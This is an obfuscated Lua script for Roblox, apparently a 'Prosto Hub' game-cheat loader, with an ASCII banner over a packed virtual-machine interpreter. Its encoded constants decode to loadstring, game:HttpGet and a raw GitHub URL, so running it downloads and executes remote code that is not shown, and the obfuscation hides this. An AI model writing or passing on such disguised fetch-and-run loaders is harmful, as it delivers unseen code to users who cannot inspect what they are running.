--[[

$$$$$$$\                                  $$\                     $$\   $$\           $$\       
$$  __$$\                                 $$ |                    $$ |  $$ |          $$ |      
$$ |  $$ | $$$$$$\   $$$$$$\   $$$$$$$\ $$$$$$\    $$$$$$\        $$ |  $$ |$$\   $$\ $$$$$$$\  
$$$$$$$  |$$  __$$\ $$  __$$\ $$  _____|\_$$  _|  $$  __$$\       $$$$$$$$ |$$ |  $$ |$$  __$$\ 
$$  ____/ $$ |  \__|$$ /  $$ |\$$$$$$\    $$ |    $$ /  $$ |      $$  __$$ |$$ |  $$ |$$ |  $$ |
$$ |      $$ |      $$ |  $$ | \____$$\   $$ |$$\ $$ |  $$ |      $$ |  $$ |$$ |  $$ |$$ |  $$ |
$$ |      $$ |      \$$$$$$  |$$$$$$$  |  \$$$$  |\$$$$$$  |      $$ |  $$ |\$$$$$$  |$$$$$$$  |
\__|      \__|       \______/ \_______/    \____/  \______/       \__|  \__| \______/ \_______/ 
                                                                                                
  
]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v90=v5(v81,v19);v19=nil;return v90;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(878 -(282 + 595))) -(v32-(1 -0))) + (2 -1))) ;return v82-(v82%(620 -(555 + 64))) ;else local v83=931 -(857 + 74) ;local v84;while true do if (v83==(568 -(367 + 201))) then v84=(929 -(214 + (2350 -(1523 + 114))))^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0 + (0 -0)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (4 -1) + 0 );v18=v18 + 1 + (353 -(87 + 263)) ;return (v40 * (16778173 -(892 + 65))) + (v39 * (156337 -90801)) + (v38 * (472 -216)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=181 -((858 -(368 + 423)) + 113) ;local v44=(v20(v42,1 + 0 ,(153 -104) -(47 -(10 + 8)) ) * ((2 + (0 -0))^(127 -95))) + v41 ;local v45=v20(v42,973 -((1244 -(416 + 26)) + 150) ,31);local v46=((v20(v42,32)==(2 -1)) and  -1) or (1 -0) ;if (v45==0) then if (v44==(0 + 0)) then return v46 * (997 -(915 + 82)) ;else local v91=(0 -0) -0 ;while true do if (v91==(0 + 0)) then v45=1;v43=(0 + 0) -0 ;break;end end end elseif (v45==(3234 -(1069 + 118))) then return ((v44==(0 -0)) and (v46 * ((1 -0)/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-(1817 -794) ) * (v43 + (v44/(2^(52 + (0 -0))))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(438 -(145 + 293))) then return "";end end v48=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;local v49={};for v64=431 -(44 + 386) , #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v50~=(1850 -(1409 + 441))) then else local v88=718 -(15 + 703) ;while true do if (v88~=1) then else v50=1 + 0 ;break;end if ((438 -(262 + 176))==v88) then v51=0;v52=nil;v88=1;end end end if ((1723 -(345 + 1376))==v50) then v55=nil;v56=nil;v50=691 -(198 + 490) ;end if (v50~=1) then else local v89=0 -0 ;while true do if (v89==(2 -1)) then v50=1208 -(696 + 510) ;break;end if (v89==(0 -0)) then v53=nil;v54=nil;v89=1263 -(1091 + 171) ;end end end if (3~=v50) then else v57=nil;while true do if (v51==(1 + 1)) then local v96=0;while true do if (0==v96) then for v127=1,v23() do local v128=0 -0 ;local v129;local v130;while true do if (v128==(0 -0)) then local v160=0;while true do if (v160==0) then v129=374 -(123 + 251) ;v130=nil;v160=4 -3 ;end if (1==v160) then v128=699 -(208 + 490) ;break;end end end if ((1 + 0)==v128) then while true do if (v129==(0 + 0)) then v130=v21();if (v20(v130,1,1)==(836 -(660 + 176))) then local v168=0;local v169;local v170;local v171;while true do if (v168==(0 + 0)) then v169=v20(v130,2,205 -(14 + 188) );v170=v20(v130,679 -(534 + 141) ,3 + 3 );v168=1 + 0 ;end if (v168~=2) then else local v172=0 + 0 ;local v173;while true do if ((0 -0)==v172) then v173=0 -0 ;while true do if (1==v173) then v168=3;break;end if (v173==0) then local v180=0;while true do if (1~=v180) then else v173=1;break;end if ((0 -0)~=v180) then else if (v20(v170,1 + 0 ,1 + 0 )==(397 -(115 + 281))) then v171[4 -2 ]=v57[v171[2]];end if (v20(v170,2,2)==(1 + 0)) then v171[3]=v57[v171[7 -4 ]];end v180=3 -2 ;end end end end break;end end end if (v168==(868 -(550 + 317))) then local v174=0 -0 ;while true do if (v174==(1 -0)) then v168=5 -3 ;break;end if (v174~=(285 -(134 + 151))) then else v171={v22(),v22(),nil,nil};if (v169==0) then local v178=1990 -(582 + 1408) ;local v179;while true do if (0~=v178) then else v179=0 -0 ;while true do if ((0 -0)==v179) then v171[11 -8 ]=v22();v171[4]=v22();break;end end break;end end elseif (v169==1) then v171[3]=v23();elseif (v169==(1826 -(1195 + 629))) then v171[3]=v23() -(2^16) ;elseif (v169==3) then local v189=0;local v190;local v191;while true do if (v189~=1) then else while true do if (v190==0) then v191=0 -0 ;while true do if (v191==(241 -(187 + 54))) then v171[783 -(162 + 618) ]=v23() -((2 + 0)^(11 + 5)) ;v171[8 -4 ]=v22();break;end end break;end end break;end if (v189==(0 -0)) then v190=0;v191=nil;v189=1 + 0 ;end end end v174=1637 -(1373 + 263) ;end end end if (v168==3) then if (v20(v170,1003 -(451 + 549) ,1 + 2 )~=1) then else v171[5 -1 ]=v57[v171[6 -2 ]];end v52[v127]=v171;break;end end end break;end end break;end end end for v131=1385 -(746 + 638) ,v23() do v53[v131-1 ]=v28();end v96=1 + 0 ;end if (1==v96) then return v55;end end end if (v51~=0) then else local v97=0 -0 ;while true do if (v97~=(341 -(218 + 123))) then else local v123=0;while true do if (v123==0) then v52={};v53={};v123=1;end if (v123==(1582 -(1535 + 46))) then v97=1;break;end end end if (v97==2) then v51=1;break;end if (v97~=(1 + 0)) then else local v124=0;while true do if (1==v124) then v97=1 + 1 ;break;end if (v124~=0) then else v54={};v55={v52,v53,nil,v54};v124=1 -0 ;end end end end end if (v51~=1) then else v56=v23();v57={};for v99=1468 -(899 + 568) ,v56 do local v100=0;local v101;local v102;local v103;local v104;while true do if (v100~=0) then else v101=0;v102=nil;v100=1;end if (v100==1) then v103=nil;v104=nil;v100=2;end if (v100==(2 + 0)) then while true do if (v101~=(2 -1)) then else v104=nil;while true do if (v102==(603 -(268 + 335))) then v103=v21();v104=nil;v102=291 -(60 + 230) ;end if (v102~=1) then else if (v103==(573 -(426 + 146))) then v104=v21()~=(0 + 0) ;elseif (v103==(1458 -(282 + 1174))) then v104=v24();elseif (v103==3) then v104=v25();end v57[v99]=v104;break;end end break;end if (v101==(811 -(569 + 242))) then v102=0 -0 ;v103=nil;v101=1 + 0 ;end end break;end end end v55[3]=v21();v51=2;end end break;end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=3) then if (v79<=1) then if (v79==0) then v76[v78[2]]();elseif ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v60;else v76[v78[2]]=v60[v78[3]];end elseif (v79==2) then local v105=v78[2];local v106=v76[v78[3]];v76[v105 + 1 ]=v106;v76[v105]=v106[v78[4]];else local v110=v78[2];v76[v110]=v76[v110](v13(v76,v110 + 1 ,v71));end elseif (v79<=5) then if (v79==4) then local v112=0;local v113;local v114;local v115;local v116;local v117;while true do if (v112==6) then v71=(v115 + v117) -1 ;v113=0;for v155=v117,v71 do v113=v113 + 1 ;v76[v155]=v114[v113];end v70=v70 + 1 ;v112=7;end if (v112==3) then v76[v117 + 1 ]=v116;v76[v117]=v116[v78[4]];v70=v70 + 1 ;v78=v66[v70];v112=4;end if (2==v112) then v70=v70 + 1 ;v78=v66[v70];v117=v78[2];v116=v76[v78[3]];v112=3;end if (8==v112) then v78=v66[v70];v76[v78[2]]();v70=v70 + 1 ;v78=v66[v70];v112=9;end if (v112==7) then v78=v66[v70];v117=v78[2];v76[v117]=v76[v117](v13(v76,v117 + 1 ,v71));v70=v70 + 1 ;v112=8;end if (4==v112) then v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3]~=0 ;v112=5;end if (v112==1) then if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v60;else v76[v78[2]]=v60[v78[3]];end v70=v70 + 1 ;v78=v66[v70];if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v60;else v76[v78[2]]=v60[v78[3]];end v112=2;end if (v112==5) then v70=v70 + 1 ;v78=v66[v70];v117=v78[2];v114,v115=v69(v76[v117](v13(v76,v117 + 1 ,v78[3])));v112=6;end if (v112==9) then do return;end break;end if (v112==0) then v113=nil;v114,v115=nil;v116=nil;v117=nil;v112=1;end end else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=6) then local v119=v78[2];local v120,v121=v69(v76[v119](v13(v76,v119 + 1 ,v78[3])));v71=(v121 + v119) -1 ;local v122=0;for v125=v119,v71 do local v126=0;while true do if (0==v126) then v122=v122 + 1 ;v76[v125]=v120[v122];break;end end end elseif (v79==7) then v76[v78[2]]=v78[3];else do return;end end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A78636C75612F54696D75726B6150726F4C7561436F6465722O32382F6D61696E2F79653O73636865636B00093O0012043O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);
